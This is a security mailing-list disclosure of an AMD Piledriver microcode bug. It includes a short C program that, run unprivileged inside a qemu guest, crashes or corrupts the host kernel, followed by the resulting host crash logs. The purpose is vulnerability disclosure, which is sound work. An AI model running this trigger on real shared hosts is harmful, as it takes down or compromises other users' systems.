Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 14 Jun 2016 06:24:13 +0200
From: Robert Święcki <robert@...ecki.net>
To: oss-security@...ts.openwall.com
Subject: Re: AMD newest ucode 0x06000832 for Piledriver-based CPUs seems to
 behave in a problematic way

> > AMD newest public ucode 0x06000832 for Piledriver-based CPUs (newer
> > AMD FX, and Opteron 3300/4300/6300 series) seems to be broken. Under
> > certain conditions it allows unprivileged users running under qemu VMs
> > to affect the host Linux kernel in a problematic manner: the CPU
> > starts to behave in an erratic way, and it leads to CPU execution flow
> > of the host kernel (the one running on bare metal) to be changed.
>
> It seems that AMD (somewhat silently) released - in
> https://lkml.org/lkml/2016/3/17/43 - a new microcode for 15th family
> of AMD CPUs.

AMD has updated their microcode some time ago, therefore here's some
more data on this bug, and code that triggers it.

On the guest system:
==================================================
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <linux/perf_event.h>

int main (void)
{
  int i;

 // increasing i from 2 to 3-10 makes it easier
 // to trigger Oops in the host kernel
  for (i = 0; i < 2; i++)
  {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof attr);
    attr.type = PERF_TYPE_HARDWARE;
    attr.size = sizeof attr;
    attr.config = PERF_COUNT_HW_CACHE_MISSES;
    attr.sample_period = 32;
    syscall(__NR_perf_event_open, &attr, 0, 0, -1, 0, 0);
  }
}
==================================================

And typical crashes in the host kernel:

Stack-protector failure (stack corruption)
==================================================
<0>[ 8685.963905] Kernel panic - not syncing: stack-protector: Kernel
stack is corrupted in: ffffffffc04e97dc
<0>[ 8685.963905]
<4>[ 8685.965386] CPU: 1 PID: 6600 Comm: qemu-system-x86 Not tainted
4.4.0-5-generic #20-Ubuntu
<4>[ 8685.966455] Hardware name: To be filled by O.E.M. To be filled
by O.E.M./Crosshair V Formula, BIOS 1703 10/17/2012
<4>[ 8685.967857]  0000000000000000 00000000d760d174 ffff8804020e3c98
ffffffff813da514
<4>[ 8685.968834]  ffffffff81cae730 ffff8804020e3d20 ffffffff81187752
0000000000000010
<4>[ 8685.969840]  ffff8804020e3d30 ffff8804020e3cc8 00000000d760d174
ffff8804020e3d30
<4>[ 8685.970839] Call Trace:
<4>[ 8685.971165]  [<ffffffff813da514>] dump_stack+0x44/0x60
<4>[ 8685.971864]  [<ffffffff81187752>] panic+0xd3/0x21a
<4>[ 8685.972508]  [<ffffffffc04e97dc>] ? vcpu_enter_guest+0xffc/0x1000 [kvm]
<4>[ 8685.973396]  [<ffffffff8107ea09>] __stack_chk_fail+0x19/0x20
<4>[ 8685.974177]  [<ffffffffc04e97dc>] vcpu_enter_guest+0xffc/0x1000 [kvm]
<4>[ 8685.975030]  [<ffffffffc04e9176>] vcpu_enter_guest+0x996/0x1000 [kvm]
<4>[ 8685.975903]  [<ffffffff8108bae1>] ? __set_task_blocked+0x41/0xa0
<4>[ 8685.976719]  [<ffffffff8108e426>] ? __set_current_blocked+0x36/0x60
<4>[ 8685.977571]  [<ffffffffc04ef62f>] kvm_arch_vcpu_ioctl_run+0xdf/0x400 [kvm]
<4>[ 8685.978479]  [<ffffffffc04d703d>] kvm_vcpu_ioctl+0x33d/0x5f0 [kvm]
<4>[ 8685.979319]  [<ffffffff810ff473>] ? do_futex+0xd3/0x500
<4>[ 8685.980024]  [<ffffffff8121b158>] do_vfs_ioctl+0x298/0x480
<4>[ 8685.980754]  [<ffffffffc0500f00>] ? check_perm_out+0x50/0x50 [kvm]
<4>[ 8685.981595]  [<ffffffffc04d1070>] ? kvm_vcpu_mmap+0x20/0x20 [kvm]
<4>[ 8685.982418]  [<ffffffff8121b3b9>] SyS_ioctl+0x79/0x90
<4>[ 8685.983081]  [<ffffffff818126f2>] entry_SYSCALL_64_fastpath+0x16/0x71
<4>[ 8685.983949]  [<ffffffff818126c7>] ?
entry_SYSCALL_64_after_swapgs+0x34/0x49
==================================================


Invalid EIP
==================================================
[  582.367744] BUG: unable to handle kernel paging request at ffff8807fbf2c040
[  582.367852] IP: [<ffff8807fbf2c040>] 0xffff8807fbf2c040
[  582.367929] PGD 1d39067 PUD 7fbb58063 PMD 80000007fbe001e3
[  582.368071] Oops: 0011 [#1] SMP
[  582.368175] Modules linked in: kvm_amd kvm.....
[  582.370970] CPU: 4 PID: 2427 Comm: qemu-system-x86 Not tainted
4.3.0-0.bpo.1-amd64 #1 Debian 4.3.3-7~bpo8+1
[  582.371018] Hardware name: MICRO-STAR INTERNATIONAL CO.,LTD
MS-7596/760GM-E51(MS-7596), BIOS V3.6 10/26/2012
[  582.371064] task: ffff8807f7cc2240 ti: ffff8807fa688000 task.ti:
ffff8807fa688000
[  582.371109] RIP: 0010:[<ffff8807fbf2c040>]  [<ffff8807fbf2c040>]
0xffff8807fbf2c040
[  582.371189] RSP: 0018:ffff8807fa68be08  EFLAGS: 00010246
[  582.371237] RAX: 0000000000000000 RBX: ffffffffa048b15c RCX: 0000000000000176
[  582.371280] RDX: 0000000000000000 RSI: 000000008158c9a0 RDI: 0000000000000176
[  582.371322] RBP: ffff8807fbf2c040 R08: ffffffffa06ac050 R09: 0000000000000000
[  582.371364] R10: 00000000296c6c75 R11: ffffffff825d1e3c R12: 0000000000000000
[  582.371406] R13: 0000000000000002 R14: 0000000000000000 R15: 0000000000000000
[  582.371451] FS:  00007f9966b5f700(0000) GS:ffff8807ff680000(0000)
knlGS:0000000000000000
[  582.371497] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[  582.371541] CR2: ffff8807fbf2c040 CR3: 00000007f7fb5000 CR4: 00000000000406e0
[  582.371585] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  582.371628] DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400
[  582.371669] Stack:
[  582.371709]  ffffffffa06c5cb3 ffff8807fbf2c040 ffffffffa06b151e
0000000000000000
[  582.371890]  ffffffffa06b1655 ffffffff8118f9bd ffff8807f7fc1c80
ffff880700000000
[  582.372068]  ffffea00030e9600 00000000c3a58962 0000000266b5eb90
00005641b00d02c0
[  582.372247] Call Trace:
[  582.372324]  [<ffffffffa06c5cb3>] ? kvm_arch_vcpu_put+0x13/0x30 [kvm]
[  582.372390]  [<ffffffffa06b151e>] ? vcpu_put+0xe/0x30 [kvm]
[  582.372454]  [<ffffffffa06b1655>] ? kvm_vcpu_ioctl+0x115/0x5a0 [kvm]
[  582.372503]  [<ffffffff8118f9bd>] ? handle_mm_fault+0xb3d/0x16c0
[  582.372551]  [<ffffffff811e3255>] ? do_vfs_ioctl+0x2d5/0x4b0
[  582.372597]  [<ffffffff810ec1a3>] ? SyS_futex+0x83/0x180
[  582.372644]  [<ffffffff811e34a6>] ? SyS_ioctl+0x76/0x90
[  582.372690]  [<ffffffff8158a3f6>] ? system_call_fast_compare_end+0xc/0x6b
[  582.372733] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 <00> 00 91 f8 07 88 ff ff 00 00 00 00 00 00 00 00 48 24 cc
f7 07
[  582.374992] RIP  [<ffff8807fbf2c040>] 0xffff8807fbf2c040
[  582.375065]  RSP <ffff8807fa68be08>
[  582.375106] CR2: ffff8807fbf2c040
[  582.375146] ---[ end trace 73c9b508504cc249 ]---
==================================================


-- 
Robert Święcki

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ